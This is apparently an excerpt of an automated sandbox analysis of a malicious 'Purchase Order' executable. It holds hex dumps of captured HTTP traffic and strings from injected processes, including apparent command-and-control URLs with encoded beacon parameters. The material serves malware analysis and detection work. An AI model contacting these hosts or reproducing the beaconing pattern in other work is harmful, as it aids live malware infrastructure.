68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:17:36 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:17:39 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:17:41 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:18:02 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 15 Sep 2022 09:59:43 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4677Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 28 a5 1e fc 61 7b e3 38 6a 6f 8e 17 74 1e c2 45 49 2e fb b6 b1 d1 1f 36 b2 b2 ac 14 f6 71 5e 09 9d 3e 04 59 8a 5a a9 b3 ae 51 08 8e 8d e9 fc 48 ac 5d f3 72 42 69 73 5f 89 34 95 3a 1f 1e 8c 4a 61 72 a9 f9 21 63 0f fb 99 28 a5 6a 86 05 aa 29 3a 99 88 d1 9f cb 7b 7b de 64 21 35 9a fb ee ce cf 07 d5 1c 44 ed 68 34 93 a9 2b 86 bf fe f2 6b 35 df 79 03 f6 1c 55 ec f7 fd 44 24 77 b9 a1 5a a7 7d 59 8a 1c 87 b5 51 4f 9f 2c f5 86 35 1b f1 49 3e ff 69 36 f8 a3 ca 9f 3c 1b ad 5d 32 58 a1 70 43 4d dd d3 c6 e4 02 65 5e b8 e1 e1 57 68 94 32 fd 2e 1a 7c 7e 90 cb 6c 27 89 f6 a7 df 7c 83 fa 76 2c ec e5 c2 91 99 90 73 54 de 57 64 a5 93 a4 19 47 09 27 a7 38 52 98 b9 e1 d1 0b 46 c9 14 f1 00 ff fe 4f 00 e7 f3 f9 fd da e1 45 ac c7 3e 99 a3 17 ff c6 df 87 fc 38 82 2e b1 90 56 fb d5 3f 5c a4 f7 f5 09 7e 09 b5 5b 9f e2 4b d5 17 4a e6 7a 98 f0 16 9a ef 70 a0 83 83 3d 34 86 4c 42 29 de 87 e2 59 f9 0f 1c 1e 79 ae e1 75 d6 46 f9 eb c1 c1 b7 e2 4d 84 de ae e6 01 ff fb d6 eb 05 59 87 e9 a4 b9 df 1e bf 62 f7 f3 f3 05 3b eb 1a 85 43 e9 d8 83 64 b4 35 f1 5b 07 26 54 57 a4 ef 13 52 64 86 7b 2f 5f 1d 1c 6c 0e fb 79 e7 b0 6f 04 cf d1 59 27 0c 2b 02 f1 c5 11 47 87 3b 47 fc 8b fe af 8d 5c 84 e0 fd 3f 7a fe c5 4a 4c c8 39 2a 19 e5 7e 22 92 bb dc 50 ad d3 be 2c 45 8e c3 da a8 a7 4f a2 24 97 7d db d8 28 ac d9 88 4f b6 57 06 b9 cc 9e 3c 1b ad dd 32 58 21 b7 53 53 f7 b4 51 c8 a2 d5 72 78 fc ed e5 cc c4 e7 4f ab fd 85 1e 78 1e 22 0e df 23 a8 44 9a 4a 9d 0f e1 b0 4d be fd 19 41 a2 50 98 21 33 2d be 75 9a 48 12 32 a9 e4 36 ac c2 81 17 07 3f 8e a0 95 01 bf 3c 67 ec 11 94 52 f7 3b 31 3c ad 5d ea 98 1d 80 a8 1d 8d c0 e1 dc f5 39 c6 9c d7 12 06 47 f3 dd 24 a0 56 70 bf 8e a3 30 73 df 8f 42 bb 51 1e 3d fa 66 04 25 61
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:18:04 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 15 Sep 2022 09:59:43 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4677Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 28 a5 1e fc 61 7b e3 38 6a 6f 8e 17 74 1e c2 45 49 2e fb b6 b1 d1 1f 36 b2 b2 ac 14 f6 71 5e 09 9d 3e 04 59 8a 5a a9 b3 ae 51 08 8e 8d e9 fc 48 ac 5d f3 72 42 69 73 5f 89 34 95 3a 1f 1e 8c 4a 61 72 a9 f9 21 63 0f fb 99 28 a5 6a 86 05 aa 29 3a 99 88 d1 9f cb 7b 7b de 64 21 35 9a fb ee ce cf 07 d5 1c 44 ed 68 34 93 a9 2b 86 bf fe f2 6b 35 df 79 03 f6 1c 55 ec f7 fd 44 24 77 b9 a1 5a a7 7d 59 8a 1c 87 b5 51 4f 9f 2c f5 86 35 1b f1 49 3e ff 69 36 f8 a3 ca 9f 3c 1b ad 5d 32 58 a1 70 43 4d dd d3 c6 e4 02 65 5e b8 e1 e1 57 68 94 32 fd 2e 1a 7c 7e 90 cb 6c 27 89 f6 a7 df 7c 83 fa 76 2c ec e5 c2 91 99 90 73 54 de 57 64 a5 93 a4 19 47 09 27 a7 38 52 98 b9 e1 d1 0b 46 c9 14 f1 00 ff fe 4f 00 e7 f3 f9 fd da e1 45 ac c7 3e 99 a3 17 ff c6 df 87 fc 38 82 2e b1 90 56 fb d5 3f 5c a4 f7 f5 09 7e 09 b5 5b 9f e2 4b d5 17 4a e6 7a 98 f0 16 9a ef 70 a0 83 83 3d 34 86 4c 42 29 de 87 e2 59 f9 0f 1c 1e 79 ae e1 75 d6 46 f9 eb c1 c1 b7 e2 4d 84 de ae e6 01 ff fb d6 eb 05 59 87 e9 a4 b9 df 1e bf 62 f7 f3 f3 05 3b eb 1a 85 43 e9 d8 83 64 b4 35 f1 5b 07 26 54 57 a4 ef 13 52 64 86 7b 2f 5f 1d 1c 6c 0e fb 79 e7 b0 6f 04 cf d1 59 27 0c 2b 02 f1 c5 11 47 87 3b 47 fc 8b fe af 8d 5c 84 e0 fd 3f 7a fe c5 4a 4c c8 39 2a 19 e5 7e 22 92 bb dc 50 ad d3 be 2c 45 8e c3 da a8 a7 4f a2 24 97 7d db d8 28 ac d9 88 4f b6 57 06 b9 cc 9e 3c 1b ad dd 32 58 21 b7 53 53 f7 b4 51 c8 a2 d5 72 78 fc ed e5 cc c4 e7 4f ab fd 85 1e 78 1e 22 0e df 23 a8 44 9a 4a 9d 0f e1 b0 4d be fd 19 41 a2 50 98 21 33 2d be 75 9a 48 12 32 a9 e4 36 ac c2 81 17 07 3f 8e a0 95 01 bf 3c 67 ec 11 94 52 f7 3b 31 3c ad 5d ea 98 1d 80 a8 1d 8d c0 e1 dc f5 39 c6 9c d7 12 06 47 f3 dd 24 a0 56 70 bf 8e a3 30 73 df 8f 42 bb 51 1e 3d fa 66 04 25 61
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:18:07 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 15 Sep 2022 09:59:43 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4677Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 28 a5 1e fc 61 7b e3 38 6a 6f 8e 17 74 1e c2 45 49 2e fb b6 b1 d1 1f 36 b2 b2 ac 14 f6 71 5e 09 9d 3e 04 59 8a 5a a9 b3 ae 51 08 8e 8d e9 fc 48 ac 5d f3 72 42 69 73 5f 89 34 95 3a 1f 1e 8c 4a 61 72 a9 f9 21 63 0f fb 99 28 a5 6a 86 05 aa 29 3a 99 88 d1 9f cb 7b 7b de 64 21 35 9a fb ee ce cf 07 d5 1c 44 ed 68 34 93 a9 2b 86 bf fe f2 6b 35 df 79 03 f6 1c 55 ec f7 fd 44 24 77 b9 a1 5a a7 7d 59 8a 1c 87 b5 51 4f 9f 2c f5 86 35 1b f1 49 3e ff 69 36 f8 a3 ca 9f 3c 1b ad 5d 32 58 a1 70 43 4d dd d3 c6 e4 02 65 5e b8 e1 e1 57 68 94 32 fd 2e 1a 7c 7e 90 cb 6c 27 89 f6 a7 df 7c 83 fa 76 2c ec e5 c2 91 99 90 73 54 de 57 64 a5 93 a4 19 47 09 27 a7 38 52 98 b9 e1 d1 0b 46 c9 14 f1 00 ff fe 4f 00 e7 f3 f9 fd da e1 45 ac c7 3e 99 a3 17 ff c6 df 87 fc 38 82 2e b1 90 56 fb d5 3f 5c a4 f7 f5 09 7e 09 b5 5b 9f e2 4b d5 17 4a e6 7a 98 f0 16 9a ef 70 a0 83 83 3d 34 86 4c 42 29 de 87 e2 59 f9 0f 1c 1e 79 ae e1 75 d6 46 f9 eb c1 c1 b7 e2 4d 84 de ae e6 01 ff fb d6 eb 05 59 87 e9 a4 b9 df 1e bf 62 f7 f3 f3 05 3b eb 1a 85 43 e9 d8 83 64 b4 35 f1 5b 07 26 54 57 a4 ef 13 52 64 86 7b 2f 5f 1d 1c 6c 0e fb 79 e7 b0 6f 04 cf d1 59 27 0c 2b 02 f1 c5 11 47 87 3b 47 fc 8b fe af 8d 5c 84 e0 fd 3f 7a fe c5 4a 4c c8 39 2a 19 e5 7e 22 92 bb dc 50 ad d3 be 2c 45 8e c3 da a8 a7 4f a2 24 97 7d db d8 28 ac d9 88 4f b6 57 06 b9 cc 9e 3c 1b ad dd 32 58 21 b7 53 53 f7 b4 51 c8 a2 d5 72 78 fc ed e5 cc c4 e7 4f ab fd 85 1e 78 1e 22 0e df 23 a8 44 9a 4a 9d 0f e1 b0 4d be fd 19 41 a2 50 98 21 33 2d be 75 9a 48 12 32 a9 e4 36 ac c2 81 17 07 3f 8e a0 95 01 bf 3c 67 ec 11 94 52 f7 3b 31 3c ad 5d ea 98 1d 80 a8 1d 8d c0 e1 dc f5 39 c6 9c d7 12 06 47 f3 dd 24 a0 56 70 bf 8e a3 30 73 df 8f 42 bb 51 1e 3d fa 66 04 25 61
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:18:09 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 15 Sep 2022 09:59:43 GMTAccept-Ranges: bytesContent-Length: 11816Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 09 09 3c 21 2d 2d 20 41 64 64 20 53 6c 69 64 65 20 4f 75 74 73 20 2d 2d 3e 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 20 20 20 20 20 20 20 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 63 67 69 2d 73 79 73 2f 6a 73 2f 73 69 6d 70 6c 65 2d 65 78 70 61 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 32 30 70 78 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 74 6f 70 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 74 6f 70 5f 77 2e 6a 70 67 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 68 65 69 67 68 74 3a 31 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 6d 69 64 2e 67 69 66 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 79 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a
        Source: nslookup.exe, 00000005.00000002.4540879237.0000000004F0C000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.00000000041BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://code.jquery.com/jquery-3.3.1.min.js
        Source: Purchase Order_20240528.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
        Source: Purchase Order_20240528.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
        Source: nslookup.exe, 00000005.00000002.4540879237.0000000004F0C000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.00000000041BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://gmpg.org/xfn/11
        Source: nslookup.exe, 00000005.00000002.4540879237.0000000004D7A000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.000000000402A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://home-stroi0m.ru/l7wc/?jTZPp=rG0gXsVcMKnwL95DCAGLkXtixogTaqlVvgNhyV5MOQBbV9UvRUrQqDi5YjTtkNY5n
        Source: nslookup.exe, 00000005.00000002.4540879237.00000000045A0000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003850000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mavonorm-global.uk/ia1k/?5L0=2bCPy0&jTZPp=N7K37PwQwyq8WtMjD63BMb0ZEyGwsNHc8DxE6cCELPJHzMSs3RH
        Source: Purchase Order_20240528.exeString found in binary or memory: http://ocsp.comodoca.com0
        Source: qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4541673061.0000000004FA7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.futurereadyteaming.com
        Source: qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4541673061.0000000004FA7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.futurereadyteaming.com/d42u/
        Source: nslookup.exe, 00000005.00000002.4542692727.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: nslookup.exe, 00000005.00000002.4542692727.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: nslookup.exe, 00000005.00000002.4540879237.0000000004A56000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003D06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/1.20.2/TweenMax.min.js
        Source: nslookup.exe, 00000005.00000002.4540879237.0000000004A56000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003D06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css
        Source: nslookup.exe, 00000005.00000002.4542692727.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: nslookup.exe, 00000005.00000002.4542692727.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: nslookup.exe, 00000005.00000002.4542692727.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: nslookup.exe, 00000005.00000002.4542692727.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: nslookup.exe, 00000005.00000002.4542692727.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
